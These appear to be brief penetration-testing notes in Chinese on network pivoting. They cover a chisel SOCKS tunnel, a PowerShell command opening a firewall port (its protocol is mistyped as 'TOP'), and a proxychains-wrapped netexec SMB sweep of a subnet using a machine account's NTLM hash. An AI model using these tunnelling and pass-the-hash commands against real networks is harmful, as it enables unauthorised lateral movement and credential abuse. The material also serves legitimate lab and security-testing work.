隧道搭建
chisel
# Server
chisel server --socks5 --port 8181
## powershll 修改防火墙规则
new-netfirewallrule -displayname "Port 8181 Inbound" -direction Inbound -protocol TOP -LocalPort 8181 -Action allow
# Client
chisel client 192.168.21.123:8181 1080:socks
# proxy
cp /etc/proxychains.conf chain1080.conf
sudo proxychains -f xxx.conf -q nxc smb 192.168.21.0/24 -u "SERVICEDESK$" -H xxxxx